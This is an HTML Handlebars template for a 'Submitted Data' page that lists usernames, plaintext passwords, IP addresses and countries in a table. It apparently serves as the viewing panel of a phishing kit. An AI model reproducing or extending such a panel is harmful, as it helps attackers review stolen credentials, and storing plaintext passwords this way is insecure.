<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Data</title>
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
    <div class="data-container">
        <h2>Submitted Data</h2>
        
        <table>
            <thead>
                <tr>
                    <th>Username</th>
                    <th>Password</th>
                    <th>IP</th>
                    <th>Country</th>
                </tr>
            </thead>
            <tbody>
                {{#each data}}
                    <tr>
                        <td>{{this.username}}</td>
                        <td>{{this.password}}</td>
                        <td>{{this.ip}}</td>
                        <td>{{this.country}}</td>
                    </tr>
                {{/each}}
            </tbody>
        </table>
    </div>
</body>
</html>
